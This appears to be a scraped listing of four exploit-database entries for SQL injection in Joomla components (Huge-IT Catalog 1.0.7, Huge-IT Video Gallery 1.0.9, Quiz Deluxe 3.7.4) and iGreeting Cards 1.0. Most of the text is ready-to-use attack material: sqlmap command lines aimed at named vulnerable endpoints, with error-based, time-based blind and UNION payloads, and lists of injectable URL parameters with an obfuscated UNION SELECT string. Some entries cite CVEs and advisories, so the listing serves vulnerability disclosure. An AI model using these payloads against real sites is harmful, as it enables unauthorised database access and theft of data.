  22. # Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-catalog/ # Software Link: # Version: 1.0.7 # Tested on: Linux # CVE : CVE-2016-1000125 # Advisory: http://www.vapidlabs.com/advisory.php?v=171 # Exploit: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10
  23. Hacking

    # # # # # # Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/ # Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe # Version: 3.7.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL] # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL] # # Etc.. # # # # #
  24. # Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla # Google Dork: [if applicable] # Date: 2016-09-15 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-video-gallery/ # Software Link: # Version: 1.0.9 # Tested on: Linux # CVE : CVE-2016-1000123 # Advisory: http://www.vapidlabs.com/advisory.php?v=169 # Exploit: • $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 • --- • [19:36:55] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [19:36:55] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2714 times • [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 19:36:55
  25. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #
×